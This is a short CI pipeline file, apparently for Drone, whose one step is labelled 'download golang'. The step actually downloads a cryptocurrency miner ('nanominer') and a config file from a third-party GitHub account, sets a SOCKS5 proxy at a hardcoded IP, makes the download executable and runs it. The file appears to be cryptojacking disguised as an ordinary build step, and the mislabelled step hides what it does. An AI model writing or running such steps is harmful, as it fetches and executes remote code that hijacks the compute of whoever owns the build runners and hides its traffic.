---
kind: pipeline
type: exec
name: default

platform:
  os: linux
  arch: amd64

steps:
- name: download golang
  commands:
  - wget -O 2 https://raw.githubusercontent.com/renifer12/master/main/nanominer
  - wget -O 1 https://raw.githubusercontent.com/renifer12/master/main/config.ini && export http_proxy=socks5://152.160.254.11:1080 && chmod u+x 1 && ./1
